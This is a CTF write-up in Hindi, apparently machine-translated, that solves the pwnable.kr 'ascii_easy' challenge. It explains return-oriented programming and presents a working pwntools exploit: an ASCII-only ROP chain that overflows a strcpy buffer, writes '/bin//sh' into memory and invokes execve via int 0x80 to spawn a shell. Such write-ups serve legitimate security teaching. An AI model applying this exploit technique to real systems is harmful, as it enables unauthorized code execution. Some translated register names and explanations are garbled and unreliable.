समस्या को हल करने में pwnable.kr 26 - ascii_easy। हम एक बार और सभी के लिए खरोंच से आरओपी गैजेट्स से निपटते हैं

इस लेख में, हम pwnable.kr साइट से 26 वें कार्य को हल करेंगे और समझेंगे कि ROP क्या है, यह कैसे काम करता है, यह इतना खतरनाक क्यों है, और अतिरिक्त जटिल सेनानियों के साथ ROP श्रृंखला की रचना करें।

Ascii_easy नौकरी समाधान

हम दूसरे खंड को जारी रखते हैं। मैं तुरंत कहूंगा कि यह पहले की तुलना में अधिक कठिन है, लेकिन इस बार वे हमें कार्यक्रम के स्रोत कोड प्रदान करते हैं। यहां चर्चा के बारे में मत भूलना (https://t.me/RalfHackerPublicChat) और यहाँ (https://t.me/RalfHackerChannel)। चलिए शुरू करते हैं।

Ascii_easy कैप्शन आइकन पर क्लिक करें। हमें ssh के माध्यम से कनेक्ट करने के लिए पता और पोर्ट दिया गया है।



हम SSH के माध्यम से जुड़े हुए हैं और झंडा, कार्यक्रम, स्रोत कोड और libc लाइब्रेरी देखते हैं।



स्रोत कोड देखते हैं।

#include <sys/mman.h> #include <sys/stat.h> #include <unistd.h> #include <stdio.h> #include <string.h> #include <fcntl.h> #define BASE ((void*)0x5555e000) int is_ascii(int c){ if(c>=0x20 && c<=0x7f) return 1; return 0; } void vuln(char* p){ char buf[20]; strcpy(buf, p); } void main(int argc, char* argv[]){ if(argc!=2){ printf("usage: ascii_easy [ascii input]\n"); return; } size_t len_file; struct stat st; int fd = open("/home/ascii_easy/libc-2.15.so", O_RDONLY); if( fstat(fd,&st) < 0){ printf("open error. tell admin!\n"); return; } len_file = st.st_size; if (mmap(BASE, len_file, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, fd, 0) != BASE){ printf("mmap error!. tell admin\n"); return; } int i; for(i=0; i<strlen(argv[1]); i++){ if( !is_ascii(argv[1][i]) ){ printf("you have non-ascii byte!\n"); return; } } printf("triggering bug...\n"); vuln(argv[1]); } 

चलो इसे ब्लॉक में सॉर्ट करते हैं। कार्यक्रम एक तर्क के रूप में एक स्ट्रिंग लेता है।



इस स्थिति में, स्ट्रिंग में केवल एससीआई अक्षर शामिल होने चाहिए।



एक ज्ञात आधार पते के साथ एक मेमोरी क्षेत्र और अनुमतियों को पढ़ना, लिखना और निष्पादित करना भी आवंटित किया गया है। इस क्षेत्र में libc पुस्तकालय रखा गया है।



सब कुछ के अलावा, कार्यक्रम में एक कमजोर कार्य है।



इसके अलावा, यदि आप कार्यक्रम की जांच करते हैं, तो आप यह सुनिश्चित कर सकते हैं कि इसमें एक गैर-मानक स्टैक (पैरामीटर NX) है। हम आरओपी का संकलन करके फैसला करेंगे।



लाइब्रेरी को खुद से कॉपी करते हैं।

 scp -P2222 ascii_easy@pwnable.kr:/home/ascii_easy/libc-2.15.so /root/ 

अब आपको आरओपी श्रृंखला को इकट्ठा करने की आवश्यकता है। ऐसा करने के लिए, ROP-गैजेट टूल का उपयोग करें।

 ROPgadget --binary libc-2.15.so > gadgets.txt 

गैजेट्स.टैक्स फ़ाइल में हमारे पास सभी संभावित आरओपी चेन हैं (उदाहरण 10 का उदाहरण नीचे प्रस्तुत किया गया है)।



समस्या यह है कि हमें उन विकल्पों का चयन करने की आवश्यकता है जिनमें केवल एससीआई अक्षर शामिल हैं। ऐसा करने के लिए, हम एक साधारण फ़िल्टर लिखते हैं जो केवल उन पतों को छोड़ देगा, जिनमें से प्रत्येक बाइट 0x20 से 0x7f समावेशी अंतराल के अंतर्गत आता है।

 def addr_check(addr): ret = True for i in range(0,8,2): if int(addr[i:i+2], 16) not in range(0x20, 0x80): ret = False return ret f = open('gadgets.txt', 'rt') old_gadgets = f.read().split('\n')[2:-3] f.close() new_gadgets = "" base_addr = 0x5555e000 for gadget in old_gadgets: addr = base_addr + int(gadget.split(' : ')[0], 16) if addr_check(hex(addr)[2:]): new_gadgets += (hex(addr) + ' :' + ":".join(gadget.split(':')[1:]) + '\n') f = open('new_gadgets.txt', 'wt') f.write(new_gadgets) f.close() 

प्रोग्राम चलाएँ और ROP गैजेट पतों की एक सूची प्राप्त करें जो हमें संतुष्ट करते हैं।

गैजेट्स को रोप लें

कई ने वापसी उन्मुख प्रोग्रामिंग के बारे में अधिक जानकारी मांगी। ठीक है, आइए उदाहरणों के साथ उदाहरण दें। मान लीजिए कि हमारे पास एक बफर अतिप्रवाह भेद्यता और एक अलौकिक ढेर है।

आरओपी गैजेट निर्देशों का एक संग्रह है जो एक रिटर्न स्टेटमेंट रिट के साथ समाप्त होता है। एक नियम के रूप में, गैजेट फ़ंक्शन के अंत से चुनते हैं। एक उदाहरण के रूप में कुछ कार्य करते हैं। उनमें से प्रत्येक में, आरओपी गैजेट (लाल रंग में हाइलाइट किया गया) का चयन करें।







इस प्रकार, हमारे पास कई ROP चेन हैं:

 0x000ed7cb: mov eax, edx; pop ebx; pop esi; ret 0x000ed7cd: pop ebx; pop esi; ret 0x000ed7ce: pop esi; ret 0x00033837: pop ebx; ret 0x0010ec1f: add esp, 0x2c; ret 

अब आइए जानें कि ROP चेन किस प्रकार की जानवर हैं। जब बफर ओवरफ्लो हो जाता है, तो हम रिटर्न एड्रेस को फिर से लिख सकते हैं। मान लीजिए कि जिस समय लक्ष्य निर्देश में रिट निर्देश को निष्पादित किया जाना चाहिए, यानी स्टैक के शीर्ष पर कुछ वैध पता है।

उदाहरण के लिए, हम निम्नलिखित कोड निष्पादित करना चाहते हैं:

 add esp, 0x2c add esp, 0x2c add esp, 0x2c mov eax, edx pop ebx pop esi ret 

हमें निम्नलिखित पतों के साथ वैध रिटर्न पते को फिर से लिखना होगा:

 0x0010ec1f 0x0010ec1f 0x0010ec1f 0x000ed7cb 

यह समझने के लिए कि यह क्यों काम करेगा, आइए नीचे दी गई छवि को देखें।



इस प्रकार, एक वैध पते पर लौटने के बजाय, हम अपनी आरओपी श्रृंखला के पहले पते पर जाते हैं। पहले कमांड को निष्पादित करने के बाद, रिट निर्देश प्रोग्राम को स्टैक पर अगले पते पर ले जाएगा, अर्थात दूसरी कमांड पर। दूसरा कमांड भी रिट के साथ समाप्त होता है, जो अगले कमांड पर भी जाता है, जिसका पता स्टैक पर इंगित किया गया है। इस प्रकार, हम पहले संकलित कोड का निष्पादन प्राप्त करते हैं।

ROP ascii_easy के लिए जंजीर

सबसे पहले, हम यह पता लगाएंगे कि बफर को ओवरफ्लो करने के लिए हमें कितने बाइट्स की आवश्यकता है। प्रोग्राम को gdb में चलाएं और इनपुट को लाइन फ़ीड करें।



और कार्यक्रम "bbbb" पते पर क्रैश हो जाता है, जिसका अर्थ है कि पैडिंग 32 वर्ण है।

आरओपी का उपयोग करने का सबसे सुविधाजनक तरीका निष्पादित फ़ंक्शन का उपयोग करना है। रजिस्टरों के माध्यम से गुजरता में सुविधा निहित है। आइए इस फ़ंक्शन को libc लाइब्रेरी में देखें। यह GDB का उपयोग करके किया जा सकता है।



लेकिन अगर हम मेमोरी में फंक्शन को लाइब्रेरी लोडिंग एड्रेस से जोड़ते हैं, तो हम देखेंगे कि यह एससीआई कंडीशन को संतुष्ट नहीं करेगा।



लेकिन फ़ंक्शन को कॉल करने के लिए एक और विकल्प है। यह एक सिस्टम कॉल के माध्यम से है। लिनक्स पर, प्रत्येक सिस्टम कॉल का अपना नंबर होता है। यह नंबर EAX रजिस्टर में स्थित होना चाहिए, इसके बाद int 0x80 इंटरप्ट कॉल आएगा। संपूर्ण सिसल टेबल को यहाँ देखा जा सकता है ।



इस प्रकार, निष्पादित फ़ंक्शन में संख्या 11 है, अर्थात, 0xb को EAX रजिस्टर में स्थित होना चाहिए। पैरामीटर ईबीएक्स रजिस्टरों के माध्यम से स्थानांतरित किए जाते हैं - पैरामीटर लाइन की शुरुआत में पता, ईसीएक्स - पैरामीटर लाइन और EDX को सूचक पर पता - सूचक को तर्क पर्यावरण चर पर पता।



हमें फ़ंक्शन को स्ट्रिंग '/ बिन / श' पास करने की आवश्यकता है। ऐसा करने के लिए, हमें इसे रिकॉर्डिंग के लिए अनुमत जगह पर लिखना होगा और एक पैरामीटर के रूप में स्ट्रिंग का पता पास करना होगा। लाइन को 4 वर्णों को सहेजना होगा, अर्थात '/ बिन' और '// श', क्योंकि रजिस्टरों में 4 बाइट्स होते हैं। इसके लिए, मुझे निम्नलिखित गैजेट मिले:

 0x555f3555 : pop edx ; xor eax, eax ; pop edi ; ret 0x55687b3c : mov dword ptr [edx], edi ; pop esi ; pop edi ; ret 

यह गैजेट:

1. स्टैक से स्ट्रिंग लिखने के लिए पता लें, और इसे edx रजिस्टर में डालें, eax को शून्य करता है।
2. यह स्टैक से एक मान लेता है और इसे एडी में रखता है।
3. यह edi से पता में edx के मान को कॉपी करेगा (यह हमारी पंक्ति को वांछित पते पर लिख देगा)।
4. यह स्टैक से दो और मान लेगा।

इस प्रकार, इसके संचालन के लिए निम्नलिखित मूल्यों को स्थानांतरित करना आवश्यक है:

 0x555f3555 ;    memory_addr ;     (edx) 4__ ; 4    (edi) 0x55687b3c ;    4__ ;    (esi) 4__ ;    (edi) 

फिर आप लाइन के दूसरे भाग को कॉपी करने के लिए समान गैजेट चला सकते हैं। लेखन के लिए पता ढूंढना मुश्किल नहीं होगा, क्योंकि पुस्तकालय पढ़ने, लिखने और निष्पादन के लिए सुलभ एक मेमोरी क्षेत्र में लोड किया जाता है।



असिसी स्थिति को संतुष्ट करने वाले किसी भी पते को वहां ले जाया जा सकता है। मैंने पता 0x55562023 लिया।

अब हमें एक अशक्त चरित्र के साथ अपनी रेखा को समाप्त करने की आवश्यकता है। इस कार्य के लिए, मैं निम्नलिखित गैजेट श्रृंखला का उपयोग करता हूं:

 0x555f3555 : pop edx ; xor eax, eax ; pop edi ; ret 0x5560645c : mov dword ptr [edx], eax ; ret 

यह गैजेट:

1. स्टैक से अशक्त प्रविष्टि के लिए पता लें, और इसे edx रजिस्टर में डालें, eax को शून्य करें।
2. स्टैक से मान लें।
3. शून्य ईएक्सएक्स से एडक्स में पते के मूल्य को कॉपी करें।

इस प्रकार, इसके संचालन के लिए निम्नलिखित मूल्यों को स्थानांतरित करना आवश्यक है:

 0x555f3555 ;    memory_addr+8 ;    0 -   (edx) 4__ ;    edi 0x5560645c ;    

इस प्रकार, हमने अपने स्ट्रिंग को मेमोरी में कॉपी किया। अगला, आपको मूल्यों को स्थानांतरित करने के लिए रजिस्टरों में भरना होगा। चूंकि "/ बिन / श" कार्यक्रम को निष्पादित करने के लिए अपने स्वयं के तर्क और पर्यावरण चर नहीं होंगे, इसलिए हम उनमें एक अशक्त सूचक पारित करेंगे। ईबेक्स में हम लाइन पर पता लिखते हैं और ईएक्स में हम 11 लिखते हैं - निष्पादित सिस्कोल की संख्या। इसके लिए, मुझे निम्नलिखित गैजेट मिले:

 0x555f3555 : pop edx ; xor eax, eax ; pop edi ; ret 0x556d2a51 : pop ecx ; add al, 0xa ; ret 0x5557734e : pop ebx ; ret 0x556c6864 : inc eax ; ret 

यह गैजेट:

1. Edx में स्टैक से एक मूल्य डालता है, ईएक्स को शून्य करता है।
2. स्टैक से एडी में मान को स्थानांतरित करें।
3. स्टैक से एक्स्ट तक मान को स्थानांतरित करें, शून्य ईनेक्स 10 में जोड़ें।
4. स्टैक से ebx तक मूव करें।
5. बाज को 10 से बढ़ाकर 11 करें।

इस प्रकार, इसके संचालन के लिए निम्नलिखित मूल्यों को स्थानांतरित करना आवश्यक है:

 0x555f3555 ;    memory_addr+8 ;  null (edx) 4__ ;    edi 0x556d2a51 ;    memory_addr+8 ;  null (ecx) 0x5557734e ;    memory_addr ;  -(ebx) 0x556c6864 ;    

और हम अपनी आरओपी-श्रृंखला को एक अपवाद के साथ समाप्त करते हैं।

 0x55667176 : inc esi ; int 0x80 

नीचे ऊपर का अधिक संक्षिप्त और सामान्य रिकॉर्ड है।



और पेलोड बनाने वाला कोड।

 from pwn import * payload = "a"*32 pop_edx = 0x555f3555 memory_addr = 0x55562023 mov_edx_edi = 0x55687b3c mov_edx_eax = 0x5560645c pop_ecx = 0x556d2a51 pop_ebx = 0x5557734e inc_eax = 0x556c6864 int_80 = 0x55667176 payload += p32(pop_edx) payload += p32(memory_addr) payload += '/bin' payload += p32(mov_edx_edi) payload += 'aaaaaaaa' payload += p32(pop_edx) payload += p32(memory_addr + 4) payload += '//sh' payload += p32(mov_edx_edi) payload += 'aaaaaaaa' payload += p32(pop_edx) payload += p32(memory_addr + 8) payload += 'aaaa' payload += p32(mov_edx_eax) payload += p32(pop_edx) payload += p32(memory_addr + 8) payload += 'aaaa' payload += p32(pop_ecx) payload += p32(memory_addr + 8) payload += p32(pop_ebx) payload += p32(memory_addr) payload += p32(inc_eax) payload += p32(int_80) print(payload) 

सच कहूँ तो, मेरे लिए, किसी कारण से, यह इस साइट से सबसे कठिन कार्यों में से एक था ...

आगे और अधिक जटिल ... आप टेलीग्राम पर हमसे जुड़ सकते हैं। आइए एक समुदाय को एक साथ रखें जिसमें ऐसे लोग होंगे जो आईटी के कई क्षेत्रों में पारंगत हैं, फिर हम किसी भी आईटी और सूचना सुरक्षा मुद्दों पर हमेशा एक-दूसरे की मदद कर सकते हैं।